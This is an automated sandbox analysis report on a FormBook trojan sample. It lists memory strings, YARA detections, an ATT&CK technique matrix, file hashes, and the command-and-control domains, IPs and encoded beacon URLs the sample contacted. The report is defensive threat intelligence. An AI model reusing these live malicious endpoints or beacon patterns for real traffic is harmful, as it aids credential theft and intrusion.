Source: A2028041200SD.exe	Binary or memory string: WIN_XP
Source: A2028041200SD.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: A2028041200SD.exe	Binary or memory string: WIN_XPe
Source: A2028041200SD.exe	Binary or memory string: WIN_VISTA
Source: A2028041200SD.exe	Binary or memory string: WIN_7
Source: A2028041200SD.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3877193379.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2131899884.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3878300512.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3878218687.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2131524712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3878239458.0000000002E40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3879766244.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2132464837.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_01038C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_01038C4F
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_0103923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0103923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	261 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
A2028041200SD.exe	34%	ReversingLabs	Win32.Trojan.AutoitInject
A2028041200SD.exe	26%	Virustotal		Browse
A2028041200SD.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
www.maitreyatoys.world	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.orbitoasis.online/k6yn/	100%	Avira URL Cloud	malware
http://www.superiorfencing.net/bwyw/	0%	Avira URL Cloud	safe
http://www.earbudsstore.shop/0gis/?QtKtUpvP=aMrcg/vn2G/nVrnfdsqttTKn7l5IpN7CuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbZWinawpycNRn/wEPfqmvFpRpTTVHR2CtA1GmAj29Nvoqiw==&tz=vf30S8fHB	0%	Avira URL Cloud	safe
http://www.beylikduzu616161.xyz/2nga/	0%	Avira URL Cloud	safe
http://www.earbudsstore.shop/0gis/	0%	Avira URL Cloud	safe
http://www.maitreyatoys.world/dvmh/	0%	Avira URL Cloud	safe
http://www.zxyck.net/gxyh/?QtKtUpvP=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT++SddUagkPsJGob5DgpUWzHX7f3q0+yGEQcdTuVkFKJ4g4Q==&tz=vf30S8fHB	0%	Avira URL Cloud	safe
http://www.dailyfuns.info/n9b0/	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/vluw/?tz=vf30S8fHB&QtKtUpvP=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8y2McqSV4CyXoecV2gg9VjbRvcHdH27Oe7WVepG5jlbykA==	0%	Avira URL Cloud	safe
http://www.dailyfuns.info/n9b0/?tz=vf30S8fHB&QtKtUpvP=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd4uwKXUWjpBKipcp7aPXApUFDa1q1IM66i0qgt5iDmW/Xqw==	0%	Avira URL Cloud	safe
http://www70.earbudsstore.shop/	0%	Avira URL Cloud	safe
http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732848849.9703785119&other_args=eyJ1cmkiOiAiLzBnaX	0%	Avira URL Cloud	safe
http://www.75178.club/a4h7/?QtKtUpvP=PP6GFaOQILwxi5dhMSrYmidfGUiluWiM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQIlAkX0zk7pOsjI4l/Wq/rNtJEsfTGHPBsIUykA9D3Lpwbw==&tz=vf30S8fHB	0%	Avira URL Cloud	safe
http://www.mydreamdeal.click/1ag2/?QtKtUpvP=4VB/N4F6tibqC9FTErplINOthlfgxvKF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxY86kHntrUB3V3amez42c7fYExSv8wX62GyA3d/Me6afi2Q==&tz=vf30S8fHB	0%	Avira URL Cloud	safe
http://www.thaor56.online/cboa/?QtKtUpvP=af1TSyH9ZKWDWOLime6W6+N8m41wPvg6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdbhiTzjWIK5GaGrrUVA8lRVN39YIo9Jhl2SEWFfoBlbvNzQ==&tz=vf30S8fHB	0%	Avira URL Cloud	safe
https://zkdamdjj.shop/vluw/?tz=vf30S8fHB&QtKtUpvP=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUI	0%	Avira URL Cloud	safe
http://www.orbitoasis.online/k6yn/?QtKtUpvP=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6Q7f6sEw+fEYYIvxzrJruwJPw/20oMsQ+GrA/2J3jy9WwQ==&tz=vf30S8fHB	100%	Avira URL Cloud	malware
http://www.75178.club/a4h7/	0%	Avira URL Cloud	safe
http://www.thaor56.online/cboa/	0%	Avira URL Cloud	safe
http://www.mydreamdeal.click/1ag2/	0%	Avira URL Cloud	safe
http://www.maitreyatoys.world	0%	Avira URL Cloud	safe
http://www.zxyck.net/gxyh/	0%	Avira URL Cloud	safe
http://www.beylikduzu616161.xyz/2nga/?tz=vf30S8fHB&QtKtUpvP=Q2EbwnYhq4vEVEYycJMqtdR4BlKtLPQlBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63UJrMUJCnw12qESZ+LX2nRCILA4nY1/3XgMLmpfKZAfJSNaA==	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.mydreamdeal.click	172.67.169.6	true	true		unknown
www.maitreyatoys.world	194.245.148.189	true	true	0%, Virustotal, Browse	unknown
www.zxyck.net	118.107.250.103	true	true		unknown
superiorfencing.net	103.230.159.86	true	true		unknown
thaor56.online	202.92.5.23	true	true		unknown
www.zkdamdjj.shop	104.21.40.167	true	false		high
www.earbudsstore.shop	194.195.220.41	true	true		unknown
www.beylikduzu616161.xyz	104.21.31.242	true	true		unknown
www.dailyfuns.info	209.74.77.109	true	true		unknown
gtml.huksa.huhusddfnsuegcdn.com	23.167.152.41	true	false		high
orbitoasis.online	66.29.132.194	true	true		unknown
www.75178.club	unknown	unknown	false		unknown
www.orbitoasis.online	unknown	unknown	false		unknown
www.superiorfencing.net	unknown	unknown	false		unknown
www.thaor56.online	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.beylikduzu616161.xyz/2nga/	true	Avira URL Cloud: safe	unknown
http://www.superiorfencing.net/bwyw/	true	Avira URL Cloud: safe	unknown
http://www.maitreyatoys.world/dvmh/	true	Avira URL Cloud: safe	unknown
http://www.orbitoasis.online/k6yn/	true	Avira URL Cloud: malware	unknown
http://www.earbudsstore.shop/0gis/?QtKtUpvP=aMrcg/vn2G/nVrnfdsqttTKn7l5IpN7CuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbZWinawpycNRn/wEPfqmvFpRpTTVHR2CtA1GmAj29Nvoqiw==&tz=vf30S8fHB	true	Avira URL Cloud: safe	unknown
http://www.earbudsstore.shop/0gis/	true	Avira URL Cloud: safe	unknown
http://www.dailyfuns.info/n9b0/	true	Avira URL Cloud: safe	unknown
http://www.zxyck.net/gxyh/?QtKtUpvP=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT++SddUagkPsJGob5DgpUWzHX7f3q0+yGEQcdTuVkFKJ4g4Q==&tz=vf30S8fHB	true	Avira URL Cloud: safe	unknown
http://www.dailyfuns.info/n9b0/?tz=vf30S8fHB&QtKtUpvP=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd4uwKXUWjpBKipcp7aPXApUFDa1q1IM66i0qgt5iDmW/Xqw==	true	Avira URL Cloud: safe	unknown
http://www.zkdamdjj.shop/vluw/?tz=vf30S8fHB&QtKtUpvP=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8y2McqSV4CyXoecV2gg9VjbRvcHdH27Oe7WVepG5jlbykA==	true	Avira URL Cloud: safe	unknown
http://www.75178.club/a4h7/?QtKtUpvP=PP6GFaOQILwxi5dhMSrYmidfGUiluWiM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQIlAkX0zk7pOsjI4l/Wq/rNtJEsfTGHPBsIUykA9D3Lpwbw==&tz=vf30S8fHB	true	Avira URL Cloud: safe	unknown
http://www.mydreamdeal.click/1ag2/?QtKtUpvP=4VB/N4F6tibqC9FTErplINOthlfgxvKF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxY86kHntrUB3V3amez42c7fYExSv8wX62GyA3d/Me6afi2Q==&tz=vf30S8fHB	true	Avira URL Cloud: safe	unknown
http://www.orbitoasis.online/k6yn/?QtKtUpvP=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6Q7f6sEw+fEYYIvxzrJruwJPw/20oMsQ+GrA/2J3jy9WwQ==&tz=vf30S8fHB	true	Avira URL Cloud: malware	unknown
http://www.thaor56.online/cboa/?QtKtUpvP=af1TSyH9ZKWDWOLime6W6+N8m41wPvg6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdbhiTzjWIK5GaGrrUVA8lRVN39YIo9Jhl2SEWFfoBlbvNzQ==&tz=vf30S8fHB	true	Avira URL Cloud: safe	unknown
http://www.mydreamdeal.click/1ag2/	true	Avira URL Cloud: safe	unknown
http://www.thaor56.online/cboa/	true	Avira URL Cloud: safe	unknown
http://www.75178.club/a4h7/	true	Avira URL Cloud: safe	unknown
http://www.beylikduzu616161.xyz/2nga/?tz=vf30S8fHB&QtKtUpvP=Q2EbwnYhq4vEVEYycJMqtdR4BlKtLPQlBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63UJrMUJCnw12qESZ+LX2nRCILA4nY1/3XgMLmpfKZAfJSNaA==	true	Avira URL Cloud: safe	unknown
http://www.zxyck.net/gxyh/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.earbudsstore.shop/0gis?gp=1&js=1&uuid=1732848849.9703785119&other_args=eyJ1cmkiOiAiLzBnaX	winrs.exe, 00000004.00000002.3878963892.000000000453C000.00000004.10000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.3880431445.0000000006590000.00000004.00000800.00020000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000002.3878448789.0000000003A3C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www70.earbudsstore.shop/	ohrkzzHWPesnQB.exe, 00000006.00000002.3878448789.0000000003A3C000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer	winrs.exe, 00000004.00000002.3878963892.0000000004218000.00000004.10000000.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000002.3878448789.0000000003718000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	false		high
https://zkdamdjj.shop/vluw/?tz=vf30S8fHB&QtKtUpvP=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUI	winrs.exe, 00000004.00000002.3878963892.0000000003EF4000.00000004.10000000.00040000.00000000.sdmp, ohrkzzHWPesnQB.exe, 00000006.00000002.3878448789.00000000033F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2422082879.00000000098A4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.maitreyatoys.world	ohrkzzHWPesnQB.exe, 00000006.00000002.3879766244.0000000005499000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	winrs.exe, 00000004.00000002.3880563126.0000000008088000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.195.220.41	www.earbudsstore.shop	Germany	6659	NEXINTO-DE	true
209.74.77.109	www.dailyfuns.info	United States	31744	MULTIBAND-NEWHOPEUS	true
104.21.40.167	www.zkdamdjj.shop	United States	13335	CLOUDFLARENETUS	false
103.230.159.86	superiorfencing.net	Australia	133159	MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU	true
194.245.148.189	www.maitreyatoys.world	Germany	5517	CSLDE	true
23.167.152.41	gtml.huksa.huhusddfnsuegcdn.com	Reserved	395774	ESVC-ASNUS	false
66.29.132.194	orbitoasis.online	United States	19538	ADVANTAGECOMUS	true
118.107.250.103	www.zxyck.net	Hong Kong	24321	OCENET-AS-APOCESdnBhdISPMY	true
104.21.31.242	www.beylikduzu616161.xyz	United States	13335	CLOUDFLARENETUS	true
172.67.169.6	www.mydreamdeal.click	United States	13335	CLOUDFLARENETUS	true
202.92.5.23	thaor56.online	Viet Nam	45899	VNPT-AS-VNVNPTCorpVN	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1564960
Start date and time:	2024-11-29 03:51:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	A2028041200SD.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@14/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 49 Number of non-executed functions: 294
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.195.220.41	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.earbudsstore.shop/0gis/
	SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe	Get hash	malicious	FormBook	Browse	www.gemtastic.shop/junu/
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	www.techcables.shop/0hup/
	TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Get hash	malicious	FormBook	Browse	www.ytonetgearhub.shop/l8y2/
	swift_payment_pdf.exe	Get hash	malicious	FormBook	Browse	www.cheapdesklamp.shop/9nq7/
209.74.77.109	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.gogawithme.live/6gtt/
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.futuru.xyz/8uep/
	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	www.greenthub.life/r3zg/
	file.exe	Get hash	malicious	FormBook	Browse	www.moviebuff.info/4r26/
	PO #2411071822.exe	Get hash	malicious	FormBook	Browse	www.gogawithme.live/6gtt/
	Quotation.exe	Get hash	malicious	FormBook	Browse	www.gogawithme.live/6gtt/
	payments.exe	Get hash	malicious	FormBook	Browse	www.gogawithme.live/6gtt/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.dailyfuns.info/n9b0/
104.21.40.167	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/swhs/
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/kf1m/
	NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/wut3/?D6l0F8S=a71d2iXWZwmjtFjuom9eWzv+mdeRMHZm6+v2+EUi1ZskJvHTTp5lIOph9rFSFtMOhpM1XQ/67KJlS/ITLExlGTOPMODybYiKiBVMYz6WSb2v98cStA==&xBhHN=XxBH2Fkx1FgP

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.earbudsstore.shop	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	194.195.220.41
www.zkdamdjj.shop	TNT Express Delivery Consignment AWD 87993766479.vbs	Get hash	malicious	FormBook	Browse	172.67.187.114
	PAYROLL LIST.exe	Get hash	malicious	FormBook	Browse	104.21.40.167
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	104.21.40.167
	NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbe	Get hash	malicious	FormBook	Browse	104.21.40.167
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
www.zxyck.net	Payment_Confirmation_pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	118.107.250.103
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	118.107.250.103
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	118.107.250.103
www.beylikduzu616161.xyz	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
www.mydreamdeal.click	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.27.59
www.mydreamdeal.click	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
www.dailyfuns.info	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
www.maitreyatoys.world	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	194.245.148.189

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	104.21.16.9
	1k24tbb-00241346.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.213.249
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	https://apnasofa.com/episode/index#a29heXllZWNoaW5nQGZhcmVhc3QuY29t	Get hash	malicious	Unknown	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9
	AWB8674109965.html	Get hash	malicious	HTMLPhisher	Browse	104.21.68.220
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	103.230.159.86
	https://astonishing-maize-sunstone.glitch.me/	Get hash	malicious	Unknown	Browse	103.1.185.157
	http://hrlaw.com.au	Get hash	malicious	Unknown	Browse	103.16.131.131
	http://coastiesmag.com.au	Get hash	malicious	Unknown	Browse	103.4.234.120
	TRe8oqmYKc.elf	Get hash	malicious	Mirai	Browse	103.16.161.29
	cundi.mips.elf	Get hash	malicious	Mirai	Browse	103.16.161.29
	cundi.x86.elf	Get hash	malicious	Mirai	Browse	103.16.161.29
	cundi.x86_64.elf	Get hash	malicious	Mirai	Browse	103.16.161.29
	cundi.arm7.elf	Get hash	malicious	Mirai	Browse	103.16.161.29
	cundi.arm.elf	Get hash	malicious	Mirai	Browse	103.16.161.29
NEXINTO-DE	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	212.229.165.81
	ppc.elf	Get hash	malicious	Mirai	Browse	195.180.12.28
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	212.228.240.237
	arm5.elf	Get hash	malicious	Mirai	Browse	194.195.203.106
	la.bot.arm6.elf	Get hash	malicious	Unknown	Browse	194.64.28.128
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	194.195.194.150
	sora.mips.elf	Get hash	malicious	Mirai	Browse	212.228.240.206
	arm.nn-20241122-0008.elf	Get hash	malicious	Mirai, Okiru	Browse	194.163.249.204
	sh4.elf	Get hash	malicious	Mirai	Browse	212.228.240.217
	ACH-information-Ag.pdf.html	Get hash	malicious	HTMLPhisher	Browse	194.163.42.36
MULTIBAND-NEWHOPEUS	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	209.74.77.108
	ARRIVAL NOTICE.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	209.74.77.107
	Payment_Confirmation_pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	209.74.77.108
	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	W3MzrFzSF0.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	209.74.77.109
	FACTURA 24V70 VINS.exe	Get hash	malicious	FormBook	Browse	209.74.64.190
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	209.74.77.109
	packing list G25469.exe	Get hash	malicious	FormBook	Browse	209.74.64.59
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	209.74.77.108

Process:	C:\Windows\SysWOW64\winrs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autBD3.tmp

Download File

Process:	C:\Users\user\Desktop\A2028041200SD.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.99390801361883
Encrypted:	true
SSDEEP:	6144:DkjD/HQHu14AdtU4ez+n9GWy2kMQqr63B:gjD/HSeckGPMQy6R
MD5:	D1E82D85CDB70D534D164E3D19AE3534
SHA1:	F38C24EC7AA9C2DAA4291D71D447C0F082ED433F
SHA-256:	647413465CC5305D5367B016E2821F100C6C250D06A99EB3D149CA6274A5A7DE
SHA-512:	F9368C2AEE4F9F85CA2FB3F41E5D2FF3F5FA2E7070121B353B0CC652652395606A273DFF6FF8E47290A815D89AEE599435CCAC254E8398A25A1749348FF16091
Malicious:	false
